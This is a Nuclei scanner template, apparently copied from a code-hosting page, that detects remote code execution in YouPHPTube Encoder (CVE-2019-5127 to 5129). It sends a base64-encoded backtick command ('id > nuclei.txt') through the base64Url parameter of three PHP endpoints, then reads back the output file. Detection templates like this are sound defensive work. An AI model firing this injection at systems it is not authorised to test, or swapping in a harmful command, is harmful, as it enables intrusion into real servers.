35 lines
963 B
YAML
35 lines
963 B
YAML
|
id: CVE-2019-5127
|
||
|
|
||
|
info:
|
||
|
name: YouPHPTube Encoder RCE
|
||
|
author: pikpikcu
|
||
|
severity: critical
|
||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
|
||
|
tags: cve,cve2019,rce
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
|
||
|
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
|
||
|
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
|
||
|
headers:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/objects/nuclei.txt"
|
||
|
headers:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "uid(.*)"
|
||
|
- "gid(.*)"
|
||
|
part: body
|
||
|
condition: and
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|